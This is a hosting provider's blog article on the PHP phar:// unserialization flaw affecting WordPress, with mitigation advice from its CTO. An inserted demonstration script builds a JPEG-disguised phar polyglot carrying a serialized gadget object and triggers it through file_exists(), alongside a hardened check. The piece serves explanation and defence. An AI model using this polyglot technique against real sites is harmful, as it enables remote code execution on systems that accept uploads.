Recently we brought you the breaking news story of a new WordPress vulnerability. The flaw was discovered by Sam Thomas, Director of Research at UKFast’s sister company Secarma, and was announced at Black Hat in Las Vegas, as well as at the BSides MCR event last month.
The vulnerability sits in the PHP code that the current version of WordPress is built on, so it can affect almost 30% of all sites on the web, and it is not currently being addressed. Watch the full Secarma talk here.
But what steps could you take to minimise the risk of a breach to your site?
We spoke to UKFast CTO Neil Lathwood, who gives you his thoughts on the flaw and adds some advice for those wishing to protect themselves against it.
The PHP vulnerability allows attackers to exploit a flaw in the PHP framework that WordPress is built on, which could result in a complete system compromise. The vulnerability is not limited to WordPress sites and can affect any other site that uses the same PHP framework. However, WordPress accounts for 26% of the entire web’s eCommerce sites, and 30% of the world’s top 1,000 websites are vulnerable to hacking and data breaches as a result.
The exploit offers a previously undiscovered way to trigger “unserialization” in the platform’s code, using XML eXternal Entity (XXE) injection and Server Side Request Forgery (SSRF).
An attacker uploads a specially crafted file to the target application, disguised as a normal picture or document file, for example. The attacker then triggers a file operation on a crafted file name, one which accesses the uploaded file through the “phar://” stream wrapper, causing the target application to “unserialize” metadata contained in the file. Unserialization of attacker-controlled data is a well-known critical vulnerability class, potentially resulting in the execution of malicious code.
WordPress was informed of the issue in February 2017 but has yet to take action.
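As an added, constructed example (not code from this article, from Neil Lathwood, or from Secarma’s research), the PHP script below walks through the attack described above on a single machine: it builds a phar archive whose metadata is a serialized object, disguises it with a JPEG header and a .jpg name, and then shows a hypothetical file_exists() check on a request-supplied path that unserializes that metadata via phar://, next to a hardened version of the same check. The Logger class, the file names and the upload directory are assumptions made for the demo.

```php
<?php
// Added demonstration, not code from the article or from Secarma's research.
// The Logger class, file names and paths are all constructed for this example.
// Run on PHP 7.x as:  php -d phar.readonly=0 phar_demo.php
// (PHP 8.0 and later only unserialize phar metadata on an explicit
// getMetadata() call, so the vulnerable branch no longer fires there.)

// 1. A class that already exists in the target application and whose
//    unserialization has a side effect the attacker controls. Real-world
//    gadget classes live in frameworks and plugins; this one just writes a file.
class Logger
{
    public $path;
    public $data;

    // Runs as soon as unserialize() rebuilds the object. A __destruct()
    // method would be attacker-reachable too, when the object is freed.
    public function __wakeup()
    {
        file_put_contents($this->path, $this->data);
    }
}

// 2. Attacker side: build a phar whose manifest metadata is a serialized
//    Logger, then give it a JPEG header and a .jpg name so an upload filter
//    that checks the extension and magic bytes accepts it.
function build_polyglot_phar(string $finalPath): void
{
    $tmp = dirname($finalPath) . '/build.phar';   // Phar::__construct needs a .phar name
    @unlink($tmp);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    // JPEG SOI/APP0 marker bytes, followed by the stub every phar must carry.
    $phar->setStub("\xff\xd8\xff\xe0" . '<?php __HALT_COMPILER(); ?>');
    $phar->addFromString('dummy.txt', 'dummy');   // the archive needs one entry

    $gadget = new Logger();                       // no __wakeup here: nothing fires yet
    $gadget->path = sys_get_temp_dir() . '/pwned.txt';
    $gadget->data = "written by Logger::__wakeup during a file_exists() call\n";
    $phar->setMetadata($gadget);                  // stored as serialize($gadget)
    $phar->stopBuffering();
    rename($tmp, $finalPath);                     // now "avatar.jpg", still a valid phar
}

// 3. Target side: a hypothetical check that hands a request-supplied path to a
//    filesystem function. Any function that goes through PHP's stream layer
//    will do: file_exists, is_file, filesize, file_get_contents, copy, unlink...
function vulnerable_exists(string $userPath): bool
{
    return file_exists($userPath);   // phar:// => manifest parsed => metadata unserialized
}

// 4. Hardened variant: refuse any path carrying a URL scheme, and keep the
//    filesystem call inside the directory you expect.
function hardened_exists(string $userPath, string $baseDir): bool
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $userPath)) {
        return false;                // phar://, data://, php://, ...
    }
    $real = realpath($userPath);     // realpath() never resolves stream wrappers
    return $real !== false
        && strpos($real, realpath($baseDir) . DIRECTORY_SEPARATOR) === 0;
}

$uploadDir = sys_get_temp_dir();
$upload    = $uploadDir . '/avatar.jpg';   // where the upload handler saved the "image"
build_polyglot_phar($upload);

// Later, the attacker supplies this as the "file name" to the vulnerable code path.
$evil = 'phar://' . $upload . '/dummy.txt';
var_dump(vulnerable_exists($evil));             // bool(true), and pwned.txt now exists
var_dump(hardened_exists($evil, $uploadDir));   // bool(false), nothing was unserialized

// If the application never needs phar://, remove the wrapper at bootstrap:
// stream_wrapper_unregister('phar');
```

The example writes a harmless marker file; in a real application the impact depends on which classes with useful magic methods are loadable at the time of the file operation, which is why plugins and frameworks, not the trigger itself, decide whether a phar:// call ends in code execution. Disabling phar.readonly is only needed to build the archive; the target side needs no special configuration at all.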
Basically, anyone who runs a WordPress site. While this vulnerability requires a login to WordPress, weak passwords and phishing mean that your user accounts could be compromised. However, the flaw is not limited to WordPress and affects other websites that use the same structure.
The usual security advice is paramount here and needs to be applied rigorously to protect your site from this vulnerability.
This is a constantly changing landscape, and known vulnerabilities are being addressed by vendors and the open source community daily. Tools such as web application firewalls (WAFs) can help mitigate vulnerabilities yet to be discovered, and if you are not running a WAF in front of your web application then you should consider doing so.
WordPress is actually a lot more secure today than it used to be, and the core code is audited to identify issues like this. WordPress plugins, on the other hand, are where users need to be concerned.
Speak to a UKFast security expert to find out more about protecting your solution.